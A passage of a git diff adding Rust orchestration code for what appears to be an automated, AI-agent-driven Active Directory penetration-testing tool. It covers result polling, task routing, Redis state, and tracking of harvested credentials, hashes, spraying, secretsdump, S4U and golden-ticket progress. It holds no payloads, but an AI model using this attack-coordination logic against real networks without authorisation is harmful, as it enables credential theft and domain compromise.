if source_lower.contains("asrep") || source_lower.contains("as-rep") { + techniques.push("T1558.004".to_string()); + } + if source_lower.contains("cracked") { + techniques.push("T1110".to_string()); + } + let event_id = format!( + "evt-cred-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": source, + "description": format!("Credential discovered: {domain}\\{username} via {source}"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +pub(crate) async fn create_hash_timeline_event( + dispatcher: &Arc, + username: &str, + domain: &str, + hash_type: &str, + hash_value: &str, + source: &str, +) { + let mut techniques: Vec = vec!["T1003".to_string()]; + let hash_value_lower = hash_value.to_lowercase(); + let hash_type_lower = hash_type.to_lowercase(); + let source_lower = source.to_lowercase(); + if hash_value_lower.contains("$krb5tgs$") + || matches!( + hash_type_lower.as_str(), + "kerberoast" | "krb5tgs" | "tgs-rep" | "tgs" + ) + || source_lower.contains("kerberoast") + { + techniques.push("T1558.003".to_string()); + } + if hash_value_lower.contains("$krb5asrep$") + || matches!(hash_type_lower.as_str(), "asrep" | "as-rep" | "krb5asrep") + || source_lower.contains("asrep") + || source_lower.contains("as-rep") + { + 
techniques.push("T1558.004".to_string()); + } + if hash_type_lower == "ntlm" + && (source_lower.contains("secretsdump") || source_lower.contains("dcsync")) + { + techniques.push("T1003.006".to_string()); + } + let is_critical = matches!(username.to_lowercase().as_str(), "krbtgt" | "administrator"); + let description = if is_critical { + format!("CRITICAL: Hash discovered: {domain}\\{username} ({hash_type})") + } else { + format!("Hash discovered: {domain}\\{username} ({hash_type})") + }; + let event_id = format!( + "evt-hash-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": source, + "description": description, + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} diff --git a/ares-cli/src/orchestrator/results.rs b/ares-cli/src/orchestrator/results.rs new file mode 100644 index 00000000..0f5b01ae --- /dev/null +++ b/ares-cli/src/orchestrator/results.rs @@ -0,0 +1,185 @@ +//! Result consumption loop. +//! +//! A dedicated tokio task that polls Redis for completed task results and +//! feeds them back to the main orchestration loop via an mpsc channel. +//! Mirrors the Python `MonitoringMixin._result_consumer` but uses async +//! Rust instead of a dedicated thread. + +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use tokio::sync::{mpsc, watch}; +use tracing::{debug, error, info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::routing::ActiveTaskTracker; +use crate::orchestrator::task_queue::{TaskQueue, TaskResult}; + +// --------------------------------------------------------------------------- +// CompletedTask — sent over the channel to the main loop +// --------------------------------------------------------------------------- + +/// A completed task result, ready for the orchestrator to process. +#[derive(Debug)] +pub struct CompletedTask { + pub task_id: String, + pub result: TaskResult, +} + +// --------------------------------------------------------------------------- +// Result consumer +// --------------------------------------------------------------------------- + +/// Spawn the result-consumer background task. +/// +/// Returns an mpsc receiver that the main loop reads from. +pub fn spawn_result_consumer( + queue: TaskQueue, + tracker: ActiveTaskTracker, + config: Arc, + mut shutdown: watch::Receiver, +) -> (tokio::task::JoinHandle<()>, mpsc::Receiver) { + // Bounded channel — back-pressure if the main loop can't keep up. + let (tx, rx) = mpsc::channel::(256); + + let handle = tokio::spawn(async move { + let mut consecutive_failures: u32 = 0; + let poll_interval = config.result_poll_interval; + + info!("Result consumer started"); + + loop { + // Check shutdown before each poll cycle + if *shutdown.borrow() { + info!("Result consumer shutting down"); + break; + } + + match consume_cycle(&queue, &tracker, &tx).await { + Ok(found) => { + if consecutive_failures > 0 { + info!( + prev_failures = consecutive_failures, + "Result consumer recovered" + ); + } + consecutive_failures = 0; + + if found > 0 { + debug!(results = found, "Consumed results"); + // When results arrive, poll again immediately instead + // of sleeping — results often come in bursts. 
diff --git a/ares-cli/src/orchestrator/results.rs b/ares-cli/src/orchestrator/results.rs new file mode 100644 index 00000000..0f5b01ae --- /dev/null +++ b/ares-cli/src/orchestrator/results.rs @@ -0,0 +1,185 @@ +//! Result consumption loop. +//! +//! A dedicated tokio task that polls Redis for completed task results and +//! feeds them back to the main orchestration loop via an mpsc channel. +//! Mirrors the Python `MonitoringMixin._result_consumer` but uses async +//! Rust instead of a dedicated thread. + +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use tokio::sync::{mpsc, watch}; +use tracing::{debug, error, info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::routing::ActiveTaskTracker; +use crate::orchestrator::task_queue::{TaskQueue, TaskResult}; + +// --------------------------------------------------------------------------- +// CompletedTask — sent over the channel to the main loop +// --------------------------------------------------------------------------- + +/// A completed task result, ready for the orchestrator to process. +#[derive(Debug)] +pub struct CompletedTask { + pub task_id: String, + pub result: TaskResult, +} + +// --------------------------------------------------------------------------- +// Result consumer +// --------------------------------------------------------------------------- + +/// Spawn the result-consumer background task. +/// +/// Returns an mpsc receiver that the main loop reads from. +pub fn spawn_result_consumer( + queue: TaskQueue, + tracker: ActiveTaskTracker, + config: Arc<OrchestratorConfig>, + mut shutdown: watch::Receiver<bool>, +) -> (tokio::task::JoinHandle<()>, mpsc::Receiver<CompletedTask>) { + // Bounded channel — back-pressure if the main loop can't keep up. + let (tx, rx) = mpsc::channel::<CompletedTask>(256); + + let handle = tokio::spawn(async move { + let mut consecutive_failures: u32 = 0; + let poll_interval = config.result_poll_interval; + + info!("Result consumer started"); + + loop { + // Check shutdown before each poll cycle + if *shutdown.borrow() { + info!("Result consumer shutting down"); + break; + } + + match consume_cycle(&queue, &tracker, &tx).await { + Ok(found) => { + if consecutive_failures > 0 { + info!( + prev_failures = consecutive_failures, + "Result consumer recovered" + ); + } + consecutive_failures = 0; + + if found > 0 { + debug!(results = found, "Consumed results"); + // When results arrive, poll again immediately instead + // of sleeping — results often come in bursts. + continue; + } + } + Err(e) => { + consecutive_failures += 1; + let is_conn = is_connection_error(&e); + + if is_conn { + let delay = Duration::from_secs(std::cmp::min( + 60, + 2_u64.pow(consecutive_failures.min(5)), + )); + + if consecutive_failures >= 10 { + error!( + attempt = consecutive_failures, + err = %e, + "Result consumer: Redis unavailable for extended period, still retrying" + ); + } else { + warn!( + attempt = consecutive_failures, + err = %e, + delay_secs = delay.as_secs(), + "Result consumer: connection error, retrying" + ); + } + + tokio::select! { + _ = tokio::time::sleep(delay) => {}, + _ = shutdown.changed() => { + info!("Result consumer shutting down (signalled during backoff)"); + break; + } + } + continue; + } else { + warn!(err = %e, "Result consumer non-connection error"); + } + } + } + + // Normal pace — sleep between polls + tokio::select! { + _ = tokio::time::sleep(poll_interval) => {}, + _ = shutdown.changed() => { + info!("Result consumer shutting down (signalled during sleep)"); + break; + } + } + } + + info!("Result consumer stopped"); + }); + + (handle, rx) +} + +/// One polling cycle: check all tracked tasks for results. +async fn consume_cycle( + queue: &TaskQueue, + tracker: &ActiveTaskTracker, + tx: &mpsc::Sender<CompletedTask>, +) -> Result<usize> { + let task_ids = tracker.task_ids().await; + if task_ids.is_empty() { + return Ok(0); + } + + let results = queue + .check_results_batch(&task_ids) + .await + .inspect_err(|e| warn!(tracked = task_ids.len(), err = %e, "check_results_batch failed"))?; + + let mut found = 0_usize; + for (task_id, maybe_result) in results { + if let Some(result) = maybe_result { + // Remove from tracker + tracker.remove(&task_id).await; + + // Send to main loop + let completed = CompletedTask { + task_id: task_id.clone(), + result, + }; + if tx.send(completed).await.is_err() { + // Main loop dropped the receiver — shutting down + info!("Result channel closed, stopping consumer"); + break; + } + found += 1; + } + } + + Ok(found) +} + +/// Heuristic to identify Redis connection errors. +fn is_connection_error(e: &anyhow::Error) -> bool { + let msg = e.to_string().to_lowercase(); + [ + "connection", + "connect", + "closed", + "timeout", + "broken pipe", + "reset", + "refused", + "sentinel", + ] + .iter() + .any(|kw| msg.contains(kw)) +}
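One subtlety in the reconnect path is worth calling out: the exponent is clamped to 5 before the 60-second ceiling applies, so the effective backoff plateaus at 32s and the ceiling is purely a safety bound. A standalone sketch of the schedule (nothing beyond std; `backoff_secs` is a hypothetical name, not a function in this patch):

```rust
// Illustrative sketch only — reproduces the backoff arithmetic from the
// connection-error branch above.
fn backoff_secs(consecutive_failures: u32) -> u64 {
    std::cmp::min(60, 2_u64.pow(consecutive_failures.min(5)))
}

#[test]
fn backoff_plateaus_at_32s_under_the_60s_ceiling() {
    // Failures are counted before the delay is computed, so the first
    // retry waits 2s, then 4, 8, 16, and finally 32s forever after.
    let delays: Vec<u64> = (1..=7).map(backoff_secs).collect();
    assert_eq!(delays, vec![2, 4, 8, 16, 32, 32, 32]);
}
```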
diff --git a/ares-cli/src/orchestrator/routing.rs b/ares-cli/src/orchestrator/routing.rs new file mode 100644 index 00000000..5291fa62 --- /dev/null +++ b/ares-cli/src/orchestrator/routing.rs @@ -0,0 +1,258 @@ +//! Task routing — decides which agent queue receives a task. +//! +//! Mirrors the Python `ares.core.dispatcher.routing.RoutingMixin` logic: +//! route by role, respect per-role concurrency limits, track active tasks. + +use std::collections::HashMap; +use std::sync::Arc; + +use tokio::sync::Mutex; + +// --------------------------------------------------------------------------- +// Active-task tracker (shared across routing + monitoring + throttling) +// --------------------------------------------------------------------------- + +/// Per-role tracking of in-flight tasks. +#[derive(Debug, Clone)] +pub struct ActiveTask { + pub task_id: String, + pub task_type: String, + pub role: String, + pub submitted_at: std::time::Instant, +} + +/// Thread-safe tracker for all in-flight tasks. +#[derive(Debug, Clone)] +pub struct ActiveTaskTracker { + inner: Arc<Mutex<TrackerInner>>, +} + +#[derive(Debug, Default)] +struct TrackerInner { + /// task_id -> ActiveTask + tasks: HashMap<String, ActiveTask>, + /// role -> count of active tasks + role_counts: HashMap<String, usize>, +} + +impl Default for ActiveTaskTracker { + fn default() -> Self { + Self::new() + } +} + +impl ActiveTaskTracker { + pub fn new() -> Self { + Self { + inner: Arc::new(Mutex::new(TrackerInner::default())), + } + } + + /// Register a newly submitted task. + pub async fn add(&self, task: ActiveTask) { + let mut inner = self.inner.lock().await; + *inner.role_counts.entry(task.role.clone()).or_insert(0) += 1; + inner.tasks.insert(task.task_id.clone(), task); + } + + /// Remove a completed/failed task. Returns the task if it was tracked. + pub async fn remove(&self, task_id: &str) -> Option<ActiveTask> { + let mut inner = self.inner.lock().await; + if let Some(task) = inner.tasks.remove(task_id) { + if let Some(count) = inner.role_counts.get_mut(&task.role) { + *count = count.saturating_sub(1); + } + Some(task) + } else { + None + } + } + + /// Number of active tasks for a role. + pub async fn count_for_role(&self, role: &str) -> usize { + let inner = self.inner.lock().await; + inner.role_counts.get(role).copied().unwrap_or(0) + } + + /// Total number of active LLM-consuming tasks (excludes `crack`, `command`). + pub async fn llm_task_count(&self) -> usize { + let inner = self.inner.lock().await; + inner + .tasks + .values() + .filter(|t| !is_non_llm_task(&t.task_type)) + .count() + } + + /// Total active tasks across all roles. + #[allow(dead_code)] + pub async fn total(&self) -> usize { + let inner = self.inner.lock().await; + inner.tasks.len() + } + + /// Get all tracked task IDs (for result polling). + pub async fn task_ids(&self) -> Vec<String> { + let inner = self.inner.lock().await; + inner.tasks.keys().cloned().collect() + } + + /// Get tasks older than `max_age` that have not received a result. + pub async fn stale_tasks(&self, max_age: std::time::Duration) -> Vec<ActiveTask> { + let inner = self.inner.lock().await; + let cutoff = std::time::Instant::now() - max_age; + inner + .tasks + .values() + .filter(|t| t.submitted_at < cutoff) + .cloned() + .collect() + } +} + +/// Task types that do not consume LLM tokens.
+const NON_LLM_TYPES: &[&str] = &["crack", "command"]; + +pub fn is_non_llm_task(task_type: &str) -> bool { + NON_LLM_TYPES.contains(&task_type) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn non_llm_task_classification() { + assert!(is_non_llm_task("crack")); + assert!(is_non_llm_task("command")); + assert!(!is_non_llm_task("recon")); + assert!(!is_non_llm_task("exploit")); + assert!(!is_non_llm_task("privesc_enumeration")); + assert!(!is_non_llm_task("")); + } + + #[tokio::test] + async fn tracker_add_remove() { + let tracker = ActiveTaskTracker::new(); + assert_eq!(tracker.total().await, 0); + + tracker + .add(ActiveTask { + task_id: "t1".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + + assert_eq!(tracker.total().await, 1); + assert_eq!(tracker.count_for_role("recon").await, 1); + assert_eq!(tracker.count_for_role("lateral").await, 0); + + let removed = tracker.remove("t1").await; + assert!(removed.is_some()); + assert_eq!(tracker.total().await, 0); + assert_eq!(tracker.count_for_role("recon").await, 0); + } + + #[tokio::test] + async fn tracker_remove_nonexistent() { + let tracker = ActiveTaskTracker::new(); + assert!(tracker.remove("nonexistent").await.is_none()); + } + + #[tokio::test] + async fn llm_count_excludes_non_llm() { + let tracker = ActiveTaskTracker::new(); + + for (id, task_type, role) in [ + ("t1", "recon", "recon"), + ("t2", "crack", "cracker"), + ("t3", "command", "lateral"), + ("t4", "exploit", "privesc"), + ] { + tracker + .add(ActiveTask { + task_id: id.into(), + task_type: task_type.into(), + role: role.into(), + submitted_at: std::time::Instant::now(), + }) + .await; + } + + assert_eq!(tracker.total().await, 4); + assert_eq!(tracker.llm_task_count().await, 2); // recon + exploit + } + + #[tokio::test] + async fn stale_tasks_detection() { + let tracker = ActiveTaskTracker::new(); + + tracker + .add(ActiveTask { + task_id: "old".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now() - std::time::Duration::from_secs(120), + }) + .await; + + tracker + .add(ActiveTask { + task_id: "new".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + + let stale = tracker + .stale_tasks(std::time::Duration::from_secs(60)) + .await; + assert_eq!(stale.len(), 1); + assert_eq!(stale[0].task_id, "old"); + } + + #[tokio::test] + async fn task_ids_collected() { + let tracker = ActiveTaskTracker::new(); + tracker + .add(ActiveTask { + task_id: "a".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + tracker + .add(ActiveTask { + task_id: "b".into(), + task_type: "exploit".into(), + role: "privesc".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + + let mut ids = tracker.task_ids().await; + ids.sort(); + assert_eq!(ids, vec!["a", "b"]); + } + + #[tokio::test] + async fn role_count_saturating_sub() { + let tracker = ActiveTaskTracker::new(); + // Double-remove shouldn't panic or underflow + tracker + .add(ActiveTask { + task_id: "t1".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + tracker.remove("t1").await; + tracker.remove("t1").await; // second remove returns None + assert_eq!(tracker.count_for_role("recon").await, 0); + } +} diff --git a/ares-cli/src/orchestrator/state/dedup.rs b/ares-cli/src/orchestrator/state/dedup.rs new 
file mode 100644 index 00000000..e49bf913 --- /dev/null +++ b/ares-cli/src/orchestrator/state/dedup.rs @@ -0,0 +1,69 @@ +//! Dedup persistence — mark_exploited, persist_dedup, persist_mssql. + +use anyhow::Result; +use redis::AsyncCommands; + +use ares_core::state; + +use super::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +impl SharedState { + /// Mark a vulnerability as exploited. + pub async fn mark_exploited(&self, queue: &TaskQueue, vuln_id: &str) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_EXPLOITED + ); + let mut conn = queue.connection(); + let _: () = conn.sadd(&key, vuln_id).await?; + let _: () = conn.expire(&key, 86400).await?; + + let mut state = self.inner.write().await; + state.exploited_vulnerabilities.insert(vuln_id.to_string()); + Ok(()) + } + + /// Persist a dedup set entry to Redis. + pub async fn persist_dedup(&self, queue: &TaskQueue, set_name: &str, key: &str) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + set_name + ); + let mut conn = queue.connection(); + let _: () = conn.sadd(&redis_key, key).await?; + let _: () = conn.expire(&redis_key, 86400).await?; + Ok(()) + } + + /// Persist MSSQL enum dispatched entry to Redis. + pub async fn persist_mssql_dispatched(&self, queue: &TaskQueue, ip: &str) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_MSSQL_ENUM_DISPATCHED + ); + let mut conn = queue.connection(); + let _: () = conn.sadd(&redis_key, ip).await?; + let _: () = conn.expire(&redis_key, 86400).await?; + Ok(()) + } +}
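All three persistence helpers above share one key shape. A sketch of that layout, assuming `KEY_PREFIX` is `"ares:op"` and `KEY_DEDUP_PREFIX` is `"dedup"` as the doc comments elsewhere in this patch suggest (the real constants live in `ares_core::state`, and `dedup_key` here is a hypothetical helper):

```rust
// Illustrative sketch only — models the Redis key layout used by
// persist_dedup; the prefix constants are assumptions, not confirmed values.
fn dedup_key(operation_id: &str, set_name: &str) -> String {
    format!("ares:op:{operation_id}:dedup:{set_name}")
}

#[test]
fn dedup_key_shape() {
    assert_eq!(
        dedup_key("op-1234", "secretsdump"),
        "ares:op:op-1234:dedup:secretsdump"
    );
}
```

The 86400-second EXPIRE after every SADD keeps abandoned operations from leaking keys: as long as an operation keeps writing, the TTL keeps renewing.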
diff --git a/ares-cli/src/orchestrator/state/inner.rs b/ares-cli/src/orchestrator/state/inner.rs new file mode 100644 index 00000000..738cf819 --- /dev/null +++ b/ares-cli/src/orchestrator/state/inner.rs @@ -0,0 +1,377 @@ +//! StateInner — the actual mutable state backing SharedState. + +use std::collections::{HashMap, HashSet}; + +use chrono::{DateTime, Utc}; + +use ares_core::models::*; + +use super::ALL_DEDUP_SETS; + +/// Lockout quarantine duration: 5 minutes matches S4U cooldown and typical +/// AD lockout observation windows. Longer values block the critical path. +const QUARANTINE_DURATION_SECS: i64 = 300; + +#[derive(Debug)] +pub struct StateInner { + pub operation_id: String, + pub target: Option<String>, + pub target_ips: Vec<String>, + + // Collections (append-mostly) + pub credentials: Vec<Credential>, + pub hashes: Vec<Hash>, + pub hosts: Vec<Host>, + pub users: Vec<User>, + pub shares: Vec<Share>, + pub domains: Vec<String>, + + // Vulnerability tracking + pub discovered_vulnerabilities: HashMap<String, VulnerabilityInfo>, + pub exploited_vulnerabilities: HashSet<String>, + + // Maps + pub domain_controllers: HashMap<String, String>, + pub netbios_to_fqdn: HashMap<String, String>, + pub domain_sids: HashMap<String, String>, + /// RID-500 account name per domain (may differ from "Administrator" if renamed). + pub admin_names: HashMap<String, String>, + + // Trust relationships (domain FQDN → trust metadata) + pub trusted_domains: HashMap<String, TrustInfo>, + + // Per-domain DA tracking: domains where krbtgt NTLM has been obtained + pub dominated_domains: HashSet<String>, + + // Flags + pub has_domain_admin: bool, + pub has_golden_ticket: bool, + pub domain_admin_path: Option<String>, + + // Dedup sets (persisted to Redis) + pub dedup: HashMap<String, HashSet<String>>, + + // MSSQL enum tracking (persisted to Redis SET) + pub mssql_enum_dispatched: HashSet<String>, + + // ACL chain data (from BloodHound, stored in Redis LIST) + pub acl_chains: Vec<serde_json::Value>, + + // ACL step dedup (tracks which chain steps have been dispatched) + pub dispatched_acl_steps: HashSet<String>, + + // Pending/completed tasks (mirrored to Redis HASHes) + pub pending_tasks: HashMap<String, TaskInfo>, + pub completed_tasks: HashMap<String, TaskResult>, + + // Credential lockout quarantine: `user@domain` → expiry time. + // Credentials that triggered STATUS_ACCOUNT_LOCKED_OUT or + // KDC_ERR_CLIENT_REVOKED are quarantined to avoid burning auth budget. + pub quarantined_credentials: HashMap<String, DateTime<Utc>>, + + // Completion flag (set externally to signal operation should wrap up) + pub completed: bool, +} + +impl StateInner { + pub(super) fn new(operation_id: String) -> Self { + let mut dedup = HashMap::new(); + for name in ALL_DEDUP_SETS { + dedup.insert(name.to_string(), HashSet::new()); + } + + Self { + operation_id, + target: None, + target_ips: Vec::new(), + credentials: Vec::new(), + hashes: Vec::new(), + hosts: Vec::new(), + users: Vec::new(), + shares: Vec::new(), + domains: Vec::new(), + discovered_vulnerabilities: HashMap::new(), + exploited_vulnerabilities: HashSet::new(), + domain_controllers: HashMap::new(), + netbios_to_fqdn: HashMap::new(), + domain_sids: HashMap::new(), + admin_names: HashMap::new(), + trusted_domains: HashMap::new(), + dominated_domains: HashSet::new(), + has_domain_admin: false, + has_golden_ticket: false, + domain_admin_path: None, + dedup, + mssql_enum_dispatched: HashSet::new(), + acl_chains: Vec::new(), + dispatched_acl_steps: HashSet::new(), + pending_tasks: HashMap::new(), + completed_tasks: HashMap::new(), + quarantined_credentials: HashMap::new(), + completed: false, + } + } + + /// Check if a username is the delegating account for a constrained + /// delegation or RBCD vulnerability. These accounts must be reserved + /// for S4U exploitation — spraying or secretsdump with their creds + /// causes lockout before S4U can use them. + pub fn is_delegation_account(&self, username: &str) -> bool { + let u = username.to_lowercase(); + self.discovered_vulnerabilities.values().any(|vuln| { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "constrained_delegation" && vtype != "rbcd" { + return false; + } + vuln.details + .get("account_name") + .or_else(|| vuln.details.get("AccountName")) + .and_then(|v| v.as_str()) + .map(|a| a.to_lowercase() == u) + .unwrap_or(false) + }) + } + + /// Check if a credential is quarantined due to lockout. + /// Expired quarantines are ignored (lazy cleanup). + pub fn is_credential_quarantined(&self, username: &str, domain: &str) -> bool { + let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); + self.quarantined_credentials + .get(&key) + .map(|expiry| Utc::now() < *expiry) + .unwrap_or(false) + } + + /// Quarantine a credential for `QUARANTINE_DURATION_SECS` after lockout.
+ pub fn quarantine_credential(&mut self, username: &str, domain: &str) { + let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); + let expiry = Utc::now() + chrono::Duration::seconds(QUARANTINE_DURATION_SECS); + self.quarantined_credentials.insert(key, expiry); + } + + /// Check if a dedup key exists in the named set. + pub fn is_processed(&self, set_name: &str, key: &str) -> bool { + self.dedup + .get(set_name) + .map(|s| s.contains(key)) + .unwrap_or(false) + } + + /// Check if any key in the named dedup set starts with `prefix`. + pub fn has_processed_prefix(&self, set_name: &str, prefix: &str) -> bool { + self.dedup + .get(set_name) + .map(|s| s.iter().any(|k| k.starts_with(prefix))) + .unwrap_or(false) + } + + /// Mark a key as processed in the named set. + pub fn mark_processed(&mut self, set_name: &str, key: String) { + self.dedup + .entry(set_name.to_string()) + .or_default() + .insert(key); + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::*; + + #[test] + fn test_state_inner_new_initializes_all_dedup_sets() { + let state = StateInner::new("op-test".into()); + assert_eq!(state.operation_id, "op-test"); + assert!(!state.has_domain_admin); + assert!(!state.has_golden_ticket); + assert!(!state.completed); + + // Every dedup set in ALL_DEDUP_SETS should be initialized + for name in ALL_DEDUP_SETS { + assert!(state.dedup.contains_key(*name), "Missing dedup set: {name}"); + assert!(state.dedup[*name].is_empty()); + } + assert_eq!(state.dedup.len(), ALL_DEDUP_SETS.len()); + } + + #[test] + fn test_is_processed_returns_false_for_unknown_set() { + let state = StateInner::new("op-1".into()); + assert!(!state.is_processed("nonexistent_set", "key1")); + } + + #[test] + fn test_mark_processed_and_is_processed() { + let mut state = StateInner::new("op-1".into()); + assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); + + state.mark_processed(DEDUP_CRACK_REQUESTS, "hash1".into()); + assert!(state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); + assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "hash2")); + } + + #[test] + fn test_mark_processed_creates_new_set_if_needed() { + let mut state = StateInner::new("op-1".into()); + state.mark_processed("custom_set", "key1".into()); + assert!(state.is_processed("custom_set", "key1")); + } + + #[test] + fn test_mark_processed_idempotent() { + let mut state = StateInner::new("op-1".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); + assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 1); + } + + #[test] + fn test_dedup_sets_are_independent() { + let mut state = StateInner::new("op-1".into()); + state.mark_processed(DEDUP_CRACK_REQUESTS, "hash1".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); + + assert!(state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); + assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "192.168.58.10")); + assert!(state.is_processed(DEDUP_SECRETSDUMP, "192.168.58.10")); + assert!(!state.is_processed(DEDUP_SECRETSDUMP, "hash1")); + } + + #[test] + fn test_exploited_vulnerabilities_tracking() { + let mut state = StateInner::new("op-1".into()); + assert!(state.exploited_vulnerabilities.is_empty()); + + state + .exploited_vulnerabilities + .insert("vuln-001".to_string()); + assert!(state.exploited_vulnerabilities.contains("vuln-001")); + assert!(!state.exploited_vulnerabilities.contains("vuln-002")); + } + + #[test] + fn test_mssql_enum_dispatched_tracking() { + let mut
state = StateInner::new("op-1".into()); + assert!(!state.mssql_enum_dispatched.contains("192.168.58.20")); + + state + .mssql_enum_dispatched + .insert("192.168.58.20".to_string()); + assert!(state.mssql_enum_dispatched.contains("192.168.58.20")); + } + + #[test] + fn test_domain_controller_map() { + let mut state = StateInner::new("op-1".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + + assert_eq!( + state.domain_controllers.get("contoso.local"), + Some(&"192.168.58.10".to_string()) + ); + assert_eq!( + state.domain_controllers.get("fabrikam.local"), + Some(&"192.168.58.20".to_string()) + ); + assert_eq!(state.domain_controllers.get("unknown.local"), None); + } + + #[test] + fn test_all_known_dedup_set_constants() { + // Verify constants are accessible and match expected names + let expected = vec![ + DEDUP_CRACK_REQUESTS, + DEDUP_SECRETSDUMP, + DEDUP_DELEGATION_CREDS, + DEDUP_ADCS_SERVERS, + DEDUP_BLOODHOUND_DOMAINS, + DEDUP_SPIDERED_SHARES, + DEDUP_EXPANSION_CREDS, + DEDUP_ASREP_DOMAINS, + DEDUP_USERNAME_SPRAY, + DEDUP_PASSWORD_SPRAY, + DEDUP_ESC8_SERVERS, + DEDUP_COERCED_DCS, + DEDUP_WRITABLE_SHARES, + DEDUP_HASH_LATERAL, + DEDUP_SCANNED_TARGETS, + DEDUP_ACL_STEPS, + DEDUP_TRUST_FOLLOW, + DEDUP_S4U_EXPLOITS, + DEDUP_GMSA_ACCOUNTS, + DEDUP_LOW_HANGING, + DEDUP_CRED_SECRETSDUMP, + DEDUP_SHARE_ENUM, + ]; + assert_eq!(expected.len(), ALL_DEDUP_SETS.len()); + for name in expected { + assert!( + ALL_DEDUP_SETS.contains(&name), + "Missing from ALL_DEDUP_SETS: {name}" + ); + } + } + + #[test] + fn test_is_delegation_account() { + let mut state = StateInner::new("op-1".into()); + assert!(!state.is_delegation_account("john.smith")); + + // Add a constrained delegation vuln for john.smith + let mut details = std::collections::HashMap::new(); + details.insert("account_name".to_string(), serde_json::json!("john.smith")); + state.discovered_vulnerabilities.insert( + "constrained_delegation_john.smith".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "constrained_delegation_john.smith".into(), + vuln_type: "constrained_delegation".into(), + target: "".into(), + discovered_by: "".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: "".into(), + priority: 8, + }, + ); + + assert!(state.is_delegation_account("john.smith")); + assert!(state.is_delegation_account("John.Smith")); // case insensitive + assert!(!state.is_delegation_account("sam.wilson")); + } + + #[test] + fn test_credential_quarantine() { + let mut state = StateInner::new("op-1".into()); + + // Not quarantined initially + assert!(!state.is_credential_quarantined("jdoe", "child.contoso.local")); + + // Quarantine a credential + state.quarantine_credential("jdoe", "child.contoso.local"); + assert!(state.is_credential_quarantined("jdoe", "child.contoso.local")); + assert!(state.is_credential_quarantined("JDOE", "CHILD.CONTOSO.LOCAL")); // case insensitive + + // Different credential not affected + assert!(!state.is_credential_quarantined("john.smith", "child.contoso.local")); + } + + #[test] + fn test_credential_quarantine_expired() { + let mut state = StateInner::new("op-1".into()); + + // Insert with an already-expired time + let key = "jdoe@child.contoso.local".to_string(); + state + .quarantined_credentials + .insert(key, Utc::now() - chrono::Duration::seconds(1)); + + // Should not be quarantined (expired) + assert!(!state.is_credential_quarantined("jdoe", 
"child.contoso.local")); + } +} diff --git a/ares-cli/src/orchestrator/state/mod.rs b/ares-cli/src/orchestrator/state/mod.rs new file mode 100644 index 00000000..1fedb6bc --- /dev/null +++ b/ares-cli/src/orchestrator/state/mod.rs @@ -0,0 +1,75 @@ +//! In-memory shared state synced with Redis. +//! +//! `SharedState` wraps the operation state in `Arc>` so that all +//! background automation tasks can read state concurrently, and writes +//! (credential publishing, result processing) are serialized. +//! +//! State is loaded from Redis at startup and updated incrementally as results +//! arrive. Dedup sets are persisted to Redis so they survive orchestrator restarts. + +mod dedup; +mod inner; +mod persistence; +mod publishing; +mod shared; + +// Re-export everything that was publicly visible from the old single file. +pub use shared::SharedState; + +// --------------------------------------------------------------------------- +// Dedup set names (match Python `ares:op:{op_id}:dedup:{name}`) +// --------------------------------------------------------------------------- + +pub const DEDUP_CRACK_REQUESTS: &str = "crack_requests"; +pub const DEDUP_SECRETSDUMP: &str = "secretsdump"; +pub const DEDUP_DELEGATION_CREDS: &str = "delegation_creds"; +pub const DEDUP_ADCS_SERVERS: &str = "adcs_servers"; +pub const DEDUP_BLOODHOUND_DOMAINS: &str = "bloodhound_domains"; +pub const 